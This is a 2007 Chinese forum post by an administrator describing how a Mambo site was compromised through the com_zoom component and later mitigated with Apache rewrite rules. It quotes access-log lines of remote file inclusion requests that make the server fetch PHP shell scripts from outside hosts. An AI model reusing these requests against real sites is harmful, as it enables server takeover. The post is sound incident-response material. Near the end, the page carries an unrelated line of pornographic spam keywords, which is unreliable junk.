
平臺(tái) 論壇博客文庫(kù)

› 論壇 › 操作系統(tǒng) › Linux新手園地 › Linux文檔專(zhuān)區(qū) › 有關(guān)Mambo components (com_zoom等) 漏洞的處理

最近訪問(wèn)板塊

查看: 1139 | 回復(fù): 0

有關(guān)Mambo components (com_zoom等) 漏洞的處理 [復(fù)制鏈接]

chenl

豐衣足食

論壇徽章:: 0

電梯直達(dá)

1樓 [收藏(0)] [報(bào)告]

發(fā)表于 2007-03-22 19:17 |只看該作者 |倒序?yàn)g覽

有關(guān)Mambo components (com_zoom等) 漏洞的處理
前些日子，朋友的一個(gè)Mambo的站點(diǎn)，突然流量暴漲，從早上6點(diǎn)開(kāi)始，從mrtg上看，流量已經(jīng)跑到100M，而且網(wǎng)站用戶(hù)也投訴說(shuō)訪問(wèn)特別慢，從而想到，可以是被入侵了。
檢查后，發(fā)現(xiàn)系統(tǒng)被植入了一個(gè)syn flood攻擊軟件。
經(jīng)過(guò)簡(jiǎn)單處理，站點(diǎn)恢復(fù)了正常，開(kāi)始考慮如何找到問(wèn)題的根源。
站點(diǎn)是CentOS4.4 final搭建的，前期的的安全措施也作了很多，理論上應(yīng)該不會(huì)有被入侵的可能。
因?yàn)閷?duì)php不是很熟悉，原來(lái)對(duì)Mambo也沒(méi)做過(guò)研究，經(jīng)過(guò)考慮，唯一可能的入侵途徑，只能是通過(guò)web，經(jīng)過(guò)徹底檢查，從web server 的access_log中發(fā)現(xiàn)了一些異常，發(fā)現(xiàn)了以下類(lèi)似的紀(jì)錄：
88.244.17.234
- - [05/Mar/2007:02:41:28 +0800] "GET
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://indir.savsak.com/shell.txt?
HTTP/1.0" 200
377
88.244.17.234 - - [05/Mar/2007:02:41:31
+0800] "GET
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://indir.savsak.com/shell.txt?
HTTP/1.0" 200 377
88.244.17.234 - - [05/Mar/2007:02:51:25 +0800]
"GET
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://uyussman.by.ru/r57.txt?
HTTP/1.1" 200 30252
88.244.17.234 - - [05/Mar/2007:02:52:18 +0800]
"POST
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://uyussman.by.ru/r57.txt?
HTTP/1.1" 200 29455
88.244.17.234 - - [05/Mar/2007:02:52:32 +0800]
"POST
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://uyussman.by.ru/r57.txt?
HTTP/1.1" 200 28116
88.244.17.234 - - [05/Mar/2007:02:54:11 +0800]
"POST
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://uyussman.by.ru/r57.txt?
HTTP/1.1" 200 28754
88.229.196.156 - - [06/Mar/2007:07:22:28 +0800]
"GET
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.spy-team.org/c99.jpg?
HTTP/1.1" 200 4851
從而確認(rèn)對(duì)方是通過(guò)com_zoom漏洞入侵的。
后來(lái)經(jīng)過(guò)徹底檢查，同時(shí)發(fā)現(xiàn)了針對(duì)administrator/components目錄也進(jìn)行了類(lèi)似的攻擊。
問(wèn)題找到了，就開(kāi)始想辦法解決，因?yàn)閷?duì)Mambo不是很熟悉，所以就打消了對(duì)Mambo系統(tǒng)進(jìn)行修改或者升級(jí)的想法。
后來(lái)，經(jīng)過(guò)分析，發(fā)現(xiàn)正常的用戶(hù)訪問(wèn)，應(yīng)該不會(huì)有類(lèi)似GET /components/com_zoom/classes/iptc/EXIF_Makernote.php這種形式的，因此考慮通過(guò)Apache的rewrite模塊對(duì)其訪問(wèn)進(jìn)行一些限制：
如下：
   RewriteRule ^(/components/.*)/(.*\.(png|gif|jpg))$ /$1/$2
      RedirectMatch ^(/components/.*)/(.*\.(php|js))  http://www.abc.cn
      RedirectMatch ^/(administrator/components/.*) http://www.abc.cn/
      RedirectMatch ^/(administrator/popups/.*) http://www.abc.cn/
經(jīng)過(guò)自己的測(cè)試，發(fā)現(xiàn)還是可以基本上解決這個(gè)問(wèn)題的。
不知是否有這方面的高手，可以給一個(gè)完整的解決方案？

本文來(lái)自ChinaUnix博客，如果查看原文請(qǐng)點(diǎn)：http://blog.chinaunix.net/u/1589/showart_263352.html

文庫(kù)|博客

返回列表

Chinaunix › 論壇 › 操作系統(tǒng) › Linux新手園地 › Linux文檔專(zhuān)區(qū) › 有關(guān)Mambo components (com_zoom等) 漏洞的處理

積分 0, 距離下一級(jí)還需積分

亚洲av成人无遮挡网站在线观看,少妇性bbb搡bbb爽爽爽,亚洲av日韩精品久久久久久,兔费看少妇性l交大片免费,无码少妇一区二区三区

有關(guān)Mambo components (com_zoom等) 漏洞的處理 [復(fù)制鏈接]